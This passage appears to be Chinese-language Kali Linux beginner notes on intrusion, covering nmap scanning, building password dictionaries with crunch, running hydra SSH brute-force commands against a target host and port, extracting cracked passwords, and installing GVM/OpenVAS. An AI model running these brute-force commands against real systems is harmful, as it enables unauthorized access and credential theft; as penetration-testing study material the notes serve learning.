使用"apt-get install [软件包名称]"命令可以安装所需的软件包。

2. ifconfig配置网络接口：ifconfig命令用于配置网络接口和显示网络信息。

使用"ifconfig"命令，可以查看当前系统中的网络接口及其IP地址、MAC地址等。

3. nmap进行端口扫描：nmap是一个强大的网络扫描工具，用于检测和识别系统上的开放端口和服务。

使用"nmap [目标IP地址]"命令可以扫描指定主机或IP地址上的开放端口。

4. msfconsole使用Metasploit框架：msfconsole是Metasploit框架的命令行管理器。

Metasploit是一个渗透测试工具，用于评估和强化系统安全。

通过msfconsole，我可以执行各种渗透测试任务，包括扫描、漏洞利用和远程控制。

5. hydra进行密码破解：hydra是一个密码破解工具，可以通过尝试各种可能的用户名和密码组合来破解目标系统的登录凭据。

使用"hydra -L [用户名列表] -P [密码列表] [目标IP地址] [服务名称]"命令可以启动密码破解攻击。

6. john破解密文：john是一个用于破解加密的密码哈希的工具。

它可以通过尝试不同的字典和密码组合来破解加密的密码。

Kali⼊侵⼊门版笔记寻找⽬标并测试开放端⼝开始前的准备我们先配置下电脑. 客户端kalilinux ⽬标windows服务器也是我们的⽬标如果你不知道怎么配置公⽹服务器可以参考下我之前的⽂章:nmap -sS -Pn -p10023 -o 准备字典1..我⾃⼰做的python字典⽣成，简介⽅便kali把源码复制就能⽤了python createDic.py2.kali⾃带的⽣成字典命令crunch 8 8 +0123 -t admin%%% >passwd.txt由于尝试ssh密码⽐正常的要么，所以密码必须精选. ⽣成8位，前5位是admin后3位是 0123其中的枚举OK我们⼿动打开，把需要的留下，并且⼿动添加常规密码.echo -e "Administrator\x0Aadmin\x0Asshd_server\x0Atest" >>users.txt把⽤户名发送到users.txt \x0A是换⾏分割⽤户 admin testecho "" >>targetIP.txt把⽬标的IP或⽹址发送到targetIP.txt⽬标端⼝hydra -p test123 -l test -o output.txt -V ssh://192.168.0.111:10023hydra -P passwd.txt -L users.txt -M targetIP.txt -o output.txt -V ssh -s 10023两个对⽐，我更喜欢后者，可以批量处理.最后结果输出到output.txt⽂件cat output.txt |awk -F'\x20' '/password/{print $1,$2,$3,$4,$5,$6,$7}' |uniq -c查找output.txt的密码数据拿到密码和端⼝就尝试登陆啦,ssh test@ -p10023漏洞扫描安装Rapid7 Nexpose：（商⽤软件）适合较⼤的⽹络 Tenable Nessus：（商⽤软件）价格相当更经济⼀些 OpenVas：免费使⽤的⼯具，更适合个⼈使⽤我们所⽤的版本是kali2020.3 openvas在2020版本后就不存在直接安装，改⽤GVMsudo apt-get update &&sudo apt-get upgrade -y &&sudo apt-get dist-upgradesudo apt-get cleansudo apt-get install gvmsudo gvm-setup我这把执⾏gvm-setup就出现了故障，参考下⾯故障解决后，再执⾏就没问题了。